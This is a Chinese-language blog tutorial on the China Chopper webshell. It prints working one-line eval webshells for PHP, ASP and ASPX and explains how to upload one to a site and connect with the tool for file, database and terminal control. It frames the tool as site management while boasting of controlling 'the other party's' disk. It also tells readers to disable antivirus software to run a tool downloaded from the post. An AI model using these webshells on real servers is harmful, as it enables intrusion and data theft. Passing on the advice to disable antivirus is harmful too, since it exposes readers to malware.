中国菜刀，webshell切菜专用

中国菜刀，一个非常好用而又强大的webshell，它可不是用来切菜的做饭的道具哦，是一款专业的网站管理软件，小巧又实用！不过被不法分子利用到，就是一个黑站的利器了。

• 1.中国菜刀支持的服务端脚本：PHP、ASP；
• 2.主要功能有：文件管理（有足够的权限时候可以管理整个磁盘/文件系统），数据库管理，虚拟终端。
• 3.菜刀的工作原理是：利用上传到服务器的一句话脚本再通过一些添加配置就可以工作了。

第一步：我们首先要新建一个php文件，文件名随意取，然后写入一句代码：<?php eval($_POST[‘cmd’]); ?>  ；eval()这个函数大家并不陌生吧，就是把里面的字符串作为PHP代码执行。最后把这个文件保存，上传到你站点里面，可以是根目录，也可以是其他，都行的。如果使用的是phpstudy，就下载到WWW目录里，这里只演示了如何创建一句话木马的代码，并没有上传到根目录。

PHP一句话木马：<?php @eval($_POST[‘cmd’]);?>

ASP一句话木马：<%eval request[‘cmd’]%>

ASPX一句话木马：<%@ Page Language=”Jscript”%><%eval(Request.Item[“cmd”],”unsafe”);%>

眼尖的童鞋已经看到了三个里面都带有cmd这个单词，没错这个就是密码，大家可以自行修改为自己使用的密码。

第二步：打开菜刀这个软件，进入如下界面，右键点击“添加”；如下图：

第三步：此时会弹出一个添加shell的对话框，由图一看出我的文件名为“yjh.php”，所以这里的地址填为：http://localhost/yjh.php 。地址后面的小框框里面的“cmd”就是你的“口令”，也就是<?php eval($_POST[‘cmd’]); ?> 这里的“cmd”。下面配置项如果你知道用户名密码就填，不知道，不填，也不会影响文件管理和虚拟终端这两个功能，只是不能查看数据库了。

最后：点击“添加”按钮，成功后就会产生一条新的记录，鼠标右键点击就可以进行操作了，如下图，可以进行文件管理，数据库管理，虚拟终端。哈哈…大功告成！！

效果图展示（可以控制对方电脑硬盘）：

在下面附上菜刀的下载链接，评论后可下载

最后说明一下：此软件打开时杀毒软件可能会报毒的，有虚拟机条件最好用虚拟机，若没有虚拟机的小伙伴也不用担心，关掉自己的杀毒软件就可以了，本人已亲自使用多次，可放心使用。